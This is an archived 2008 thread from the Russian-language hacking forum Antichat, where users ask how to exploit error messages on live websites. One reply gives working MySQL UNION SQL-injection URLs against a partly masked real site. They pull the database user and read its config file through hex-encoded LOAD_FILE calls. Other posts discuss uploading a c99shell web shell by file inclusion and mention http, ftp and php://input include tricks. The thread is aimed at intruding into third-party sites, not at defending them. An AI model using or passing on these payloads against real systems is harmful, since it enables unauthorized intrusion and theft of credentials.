ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.09.2008, 21:59
|
|
Познающий
Регистрация: 10.04.2008
Сообщений: 51
Провел на форуме:
78866
Репутация:
0
|
|
На запрос videos.php?cat_id=28' Отвечает:
Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3
Что можно предпринять? 
Последний раз редактировалось Кубик Рубик; 14.09.2008 в 22:01..
|
|
|
14.09.2008, 22:03
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
можно предпринять sql иньекцию ..
|
|
|
|
15.09.2008, 00:32
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
Сообщение от Кубик Рубик
На запрос videos.php?cat_id=28' Отвечает:
Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3
Что можно предпринять?
videos.php?cat_id=28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
{4} вывод.
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,User(),0x7873716C696E6A656E64),0x71) ,0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
и там еще кусочек файла прочитать можно
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,LOAD_FILE(0x2F7661722F7777772F68746D 6C2F736974652F636F6E662F636F6E6669672E706870),0x78 73716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19/*
все благодаря SIPT 
думаю я сайт угадал)
|
|
|
|
15.09.2008, 19:17
|
|
Познающий
Регистрация: 23.08.2007
Сообщений: 96
Провел на форуме:
454396
Репутация:
16
|
|
Parse error: syntax error, unexpected $end in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php(69) : regexp code on line 1 Fatal error: preg_replace(): Failed evaluating code: check_module('main', '
', 'format:\') in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php on line 69
ДАную ошибку как можно использовать?
|
|
|
|
15.09.2008, 19:27
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
никак
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
15.09.2008, 21:44
|
|
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634
Репутация:
97
|
|
У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?
|
|
|
|
16.09.2008, 01:36
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Rejjin, эээ...ты хоть напиши что в index.php на эту переменную о_О, а то можно написать и такое, что по этому запросу будет голая жопа во весь экран Вообщем, всё скрипта зависит. |
|
|
|
16.09.2008, 16:27
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Rejjin, =file:// - так нельзя. Можно через http и через ftp инклудить
|
|
|
|
16.09.2008, 16:46
|
|
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840
Репутация:
35
|
|
Сообщение от o3,14um
Rejjin, =file:// - так нельзя. Можно через http и через ftp инклудить
и про php://input (сырые пост данные) не забудем
|
|
|
|
16.09.2008, 17:01
|
|
Moderator - Level 7
Регистрация: 07.06.2006
Сообщений: 556
Провел на форуме:
7549607
Репутация:
2702
|
|
У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?
Да боже мой. Каким боком ты собрался инклудить файл, расположенный у тебя на машине?? localhost - это твой локальный адрес, доступный только с твоего компьютера...
Мда (с)
Или что то этому помешает?
Помешает отсутствие мозгов. Причём сильно.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x26]VOLAND](/avatars/avatar24925.jpg?865615){kind=avatar}
![Отправить сообщение для [x26]VOLAND с помощью AIM](fusion/misc/im_aim.gif)
Похожие темы
Линейный вид
